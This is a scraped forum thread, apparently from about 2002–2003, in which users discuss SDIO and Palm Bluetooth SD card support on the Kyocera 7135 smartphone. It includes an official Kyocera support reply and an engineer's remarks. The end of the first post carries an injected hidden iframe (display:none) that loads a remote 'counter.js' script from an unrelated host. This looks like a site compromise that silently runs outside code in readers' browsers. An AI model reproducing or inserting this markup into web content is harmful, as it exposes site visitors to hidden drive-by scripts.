+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 38
  1. #1
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    7135 Sdio

    Yes, the 7135 supports SDIO. The article(s) that said it didn't was(were) wrong.


    Not all SDIO devices have the appropriate drivers for the 7135 yet, but that is a temporary condition.

    A related question is whether you can use the Palm Bluetooth card. The answer is probably, depending on how you want to use it.

    It almost certainly (does anyone have one yet to confirm....) can be used to access bluetooth gateways fo access to LAN/WAN, Bluetooth enabled printers, the Emtac Bluetooth GPS, or anything else you could do with a Palm and the bluetooth card. It does not have a headset profile currently available, so at least for now, it can not be used with a bluetooth headset. Until Kyo releases the SDK, we don't know if the voice circuits in the phone will be able to access the bluetooth functions.

    It is not yet clear whether it can be used to allow another bluetooth device to access the internet through the 7135's internet connection. We are still waiting for someone who has both devices to post some info, and I will edit this FAQ when we have the answer (I suspect it is no).

    Alan<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    11-04-2002
    Posts
    151
    So Alan,

    For months, I have seen this question asked and answered on this forum. My only question is why do the detailed specifications about the 7135 on the Kyocera web site fail to mention SDIO?

    Anybody care to guess? :dunno

    t

  3. #3
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by terryg
    So Alan,

    For months, I have seen this question asked and answered on this forum. My only question is why do the detailed specifications about the 7135 on the Kyocera web site fail to mention SDIO?

    Anybody care to guess? :dunno

    t
    This is just a guess.... The products that my company produces have a lot of features that work just fine since we design to a particular specification, but we don't publish or guarantee support for those features because we just don't have the manpower or time to fully test the features.

    In the case of Kyo and SDIO, it is compounded by the fact that there are so few SDIO products available, and at least some will need product specific drivers to function. I don't think they wanted to hold up the release to regression test, but they developed the interface to meet the spec, and individual users have reported that the devices work.

    Alan

  4. #4
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Makes sense to me. And we know that SDIO does indeed work because many beta testers and early Alltel buyers have indeed used SDIO devices on the 7135.
    ~'kito
    pdaPhoneHome Moderator

  5. #5
    Registered User
    Join Date
    12-04-2002
    Posts
    17

    Re: 7135 Sdio

    Originally posted by alanb
    Yes, the 7135 supports SDIO. The article(s) that said it didn't was(were) wrong.


    Not all SDIO devices have the appropriate drivers for the 7135 yet, but that is a temporary condition.

    A related question is whether you can use the Palm Bluetooth card. The answer is probably, depending on how you want to use it.

    It almost certainly (does anyone have one yet to confirm....) can be used to access bluetooth gateways fo access to LAN/WAN, Bluetooth enabled printers, the Emtac Bluetooth GPS, or anything else you could do with a Palm and the bluetooth card. It does not have a headset profile currently available, so at least for now, it can not be used with a bluetooth headset. Until Kyo releases the SDK, we don't know if the voice circuits in the phone will be able to access the bluetooth functions.

    It is not yet clear whether it can be used to allow another bluetooth device to access the internet through the 7135's internet connection. We are still waiting for someone who has both devices to post some info, and I will edit this FAQ when we have the answer (I suspect it is no).

    Alan
    I asked this very question this afternoon wrestling with whether I would be wasting my money in experimenting on the Jabra Freespeak with a Palm Bluetooth SD card. Thank you for the information.
    The Edge

  6. #6
    Registered User
    Join Date
    09-09-2003
    Posts
    16
    I already have a Plantronics Bluetooth Headset and the 7135, all I need is a Card to play with. I wonder if CompU$A will allow an experiment......

  7. #7
    Registered User
    Join Date
    01-19-2002
    Posts
    332
    Official response from Kyocera:
    ----------------------------------------------
    Hello David,

    Thank you for contacting Kyocera Wireless.

    The Kyocera 7135 SmartPhone is compliant with SDIO. However, the this
    is not completely standardized. Some will work, and some may not.

    If your issue is still unresolved, do not hesitate to contact us again.
    Please refer to case number: 1054 when responding.

    For any future issues, please visit:
    http://support.kyocera-wireless.com/
    to get instant graphical answers to your questions.


    Kind Regards,
    Allen
    Kyocera Technical Support
    Support@Kyocera-wireless.com
    Case number: 1054
    ----------------------------------------

  8. #8
    Registered User
    Join Date
    01-08-2003
    Posts
    88
    Originally posted by Ryan@40
    I already have a Plantronics Bluetooth Headset and the 7135, all I need is a Card to play with. I wonder if CompU$A will allow an experiment......
    Try it out man! You could settle this once and for all!!! :angel

    But hey, don' t try at compusa..they have a restocking fee associated with any returns. Bastards. :anger
    "Why all the pearls, why the blue hair, why anything!?"

  9. #9
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Re: 7135 Sdio

    Originally posted by The Edge
    I asked this very question this afternoon wrestling with whether I would be wasting my money in experimenting on the Jabra Freespeak with a Palm Bluetooth SD card. Thank you for the information.
    I can tell you that the Jabra headset with it's bluetooth adapter plugged into the headset jack works well. A little tricky to get used to if you use the answer/end emulation function.

    Alan

  10. #10
    Registered User
    Join Date
    11-13-2002
    Posts
    40
    I have some very real information about Bluetooth on the 7135.

    I had left a question about the Palm Bluetooth SD card (which I scored for free from Palm at CES) with one of the Kyocera engineers at CES and he just returned my call and left a message on my machine.

    He said: "There is limited bluetooth compatiblity with the Bluetooth SD card. It will identify other bluetooth devices and can print to bluetooth enabled printers. It is NOT able to establish a bluetooth audio link so using a bluetooth headset will probably not work and will NOT be able to hotsynce because of the low data rate throughput are just too slow..."

    Not quite what I wanted to hear, but good clear information.

  11. #11
    Registered User
    Join Date
    11-14-2002
    Posts
    3
    If you call him back could you please ask about using bluetooth to connect a powerbook to the phone for an internet connection?

  12. #12
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Originally posted by smartbob
    I have some very real information about Bluetooth on the 7135.

    I had left a question about the Palm Bluetooth SD card (which I scored for free from Palm at CES) with one of the Kyocera engineers at CES and he just returned my call and left a message on my machine.

    He said: "There is limited bluetooth compatiblity with the Bluetooth SD card. It will identify other bluetooth devices and can print to bluetooth enabled printers. It is NOT able to establish a bluetooth audio link so using a bluetooth headset will probably not work and will NOT be able to hotsynce because of the low data rate throughput are just too slow..."

    Not quite what I wanted to hear, but good clear information.
    Well what good is bluetooth then? :p
    iPhone therefore iAm.

  13. #13
    Registered User
    Join Date
    01-08-2003
    Posts
    88
    Crap, if thats true we can kiss the whole Wifi combo SD card goodbye. 802.11b has a much higher throughput than Bluetooth.

    I hope TDK looks at that poll and makes a serial bluetooth adapter for the phone! One of the things I definatly want in my next phone is bluetooth functionality...
    "Why all the pearls, why the blue hair, why anything!?"

  14. #14
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Are they saying BT data rate is too slow? or SDIO data rate is too slow? Cause if its just BT then a Wifi SD would be an option.
    iPhone therefore iAm.

  15. #15
    Registered User
    Join Date
    01-08-2003
    Posts
    88
    You know what, you're right. That doesn't make any sense.

    I know for a FACT that Bluetooth isn't too slow for hotsyncs, because ive read reviews of other palm devices hotsync-ing over it. (though, I might add, one review I read said it took 30seconds longer to synch).

    The other thing is, SDIO is on other palms, why on earth would they make SDIO bluetooth MUCH LESS SDIO WIFI if the SDIO port was too slow???

    Sounds like 2+2 = green.

    Someone needs to take the plunge and give it a try!!! Please!!:alieneyes
    "Why all the pearls, why the blue hair, why anything!?"

  16. #16
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Guys, please keep the Q & A out of the FAQ and in the discussions. I copied the thread here. Alan can edit his FAQ when he needs to.

  17. #17
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by HoTSynC
    Guys, please keep the Q & A out of the FAQ and in the discussions. I copied the thread here. Alan can edit his FAQ when he needs to.
    Thanks Hotsync

  18. #18
    Registered User
    Join Date
    11-05-2002
    Posts
    54
    Originally posted by Azzy
    You know what, you're right. That doesn't make any sense.

    I know for a FACT that Bluetooth isn't too slow for hotsyncs, because ive read reviews of other palm devices hotsync-ing over it. (though, I might add, one review I read said it took 30seconds longer to synch).

    The other thing is, SDIO is on other palms, why on earth would they make SDIO bluetooth MUCH LESS SDIO WIFI if the SDIO port was too slow???

    Sounds like 2+2 = green.

    Someone needs to take the plunge and give it a try!!! Please!!:alieneyes
    sounds like kyocera might not have properly integrated SDIO with the 7135 - hence lack of official support. (Disclaimer: please note that this is conjecture, based on comments I read in this thread) Bluetooth is able to generate and sustain speeds in the low 700Kb range - I believe that is multiples of ten times faster than serial adaptors - which can sync 7135.
    If the bandwidth/throughput of the 7135's BT is too slow to sync with a pc or connect to audio applications, I think that it is a result of a halfassed implementation due to incompatible drivers or other outlying factors.

  19. #19
    Registered User
    Join Date
    02-11-2003
    Posts
    33
    I have a 12" powerbook with bluetooth built-in and I have the 7135. I want to see if I can hotsync it with isync over bluetooth with the palm sdio card, but I first want to make sure this combination has not been ruled out before I buy the bluetooth sd card. Any input helps. Thanks.

  20. #20
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by rguibara
    I have a 12" powerbook with bluetooth built-in and I have the 7135. I want to see if I can hotsync it with isync over bluetooth with the palm sdio card, but I first want to make sure this combination has not been ruled out before I buy the bluetooth sd card. Any input helps. Thanks.
    That should work. Both devices should be able to see the Bluetooth as either a serial or network connection. I can't speak with absolute authority since I haven't picked up BT cards yet.

    It is on my list of things to do.

    Alan

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts